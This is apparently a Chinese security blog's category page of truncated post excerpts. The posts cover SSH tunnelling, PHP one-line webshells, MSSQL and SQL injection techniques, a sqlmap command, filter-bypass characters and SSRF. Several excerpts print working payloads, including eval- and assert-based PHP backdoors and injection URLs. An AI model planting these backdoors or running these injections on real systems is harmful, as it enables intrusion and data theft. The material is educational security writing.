分类 基础知识 下的文章

Xshell是一个功能强大的终端模拟器,支持SSH,SFTP、TELNET、RLOGIN和SERIAL下载地址:http://www.netsarang.com/products/xsh_overview.html1、打开SSH连接属性窗口,选择隧道(下图已经添加成功一个)2、在xshell中执行持久命令避免ssh通道关闭执行 top 或者 vi 编辑文件3、SwitchySharp.......

PHP一句话后门一、常用执行代码函数1、eval():<?php @eval($_POST['hacker']); ?> eval函数将接受的字符串当做代码执行2、 assert():用法和 eval()一样<?php @assert($_POST['hacker']); ?> 3、preg_replace():<?php @preg_replace(&.......

# web-sec-interview信息安全行业从业者(Web安全/渗透测试方向)面试题目1.1介绍一下自认为有趣的挖洞经历(或CTF经历)你平时用的比较多的漏洞是哪些?相关漏洞的原理?以及对应漏洞的修复方案?你平时使用哪些工具?以及对应工具的特点?如果遇到waf的情况下如何进行sql注入/上传Webshell怎么做?请写出曾经绕过WAF的经过(SQLi,XSS,上传漏洞选一) 参.......

0x00 简介在上一章我们已经了解到了报错注入,其实MSSQL报错注入利用的就是显示或隐式转换来报错注入,比如以下就是典型的隐式转换select * from admin where id =1 and (select user)>0-- select * from admin where id =1|(select user)-- 在将 nvarchar 值 'dbo' .......

0x00 第一个注入建议大家可以本地搭建后用sqlmap注入查看他的注入语句sqlmap -u "http://192.168.130.137/1.aspx?id=1" --is-dba -v3 判断当前数据库http://192.168.130.137/1.aspx?id=1'and db_name()>0;-- 爆表名http://192.168.13.......

0x00 注释符号/* -- ;%00 0x01 空白字符01,02,03,04,05,06,07,08,09,0A,0B,0C,0D,0E,0F,10,11,12,13,14,15,16,17,18,19,1A,1B,1C,1D,1E,1F,20 /**/ 0x02 运算符号+ 加法运算 - 减法运算 * 乘法运算 / 除法运算,如果两个表达式值都是整数,.......

0x00 权限判断服务器级别我们可以在docs上面看到 IS_SRVROLEMEMBER ( 'role' [ , 'login' ] ) 函数 role 的有效值是用户定义的服务器角色和以下固定服务器角色:返回类型:返回值描述0login 不是 role 的成员。1login 是 role 的成员。NULLrole 或 login 无效,或者没有查看角色成员身份的权限。最终我们.......

-  minus 减号;负号 ± plus or minus 正负号 × is multiplied by 乘号 ÷ is divided by 除号 = is equal to 等于号 ≠ is not equal to 不等于号 ≡ is equivalent to 全等于号 ≌ is equal to or approximately equal to 等于或约等于号 ≈ is.......

SSRF(Server-Side Request Forgery, 服务端请求伪造),攻击者伪造服务端发起的请求并执行,从而获得一些数据或进行攻击危害1.对内网的端口和服务进行扫描,对主机本地的一些敏感信息获取2.利用一些应用漏洞和一些协议进行攻击常见容易造成漏洞的php函数以及利用1.file_get_contents() 2.fsockopen() 3.curl_exec() 逐.......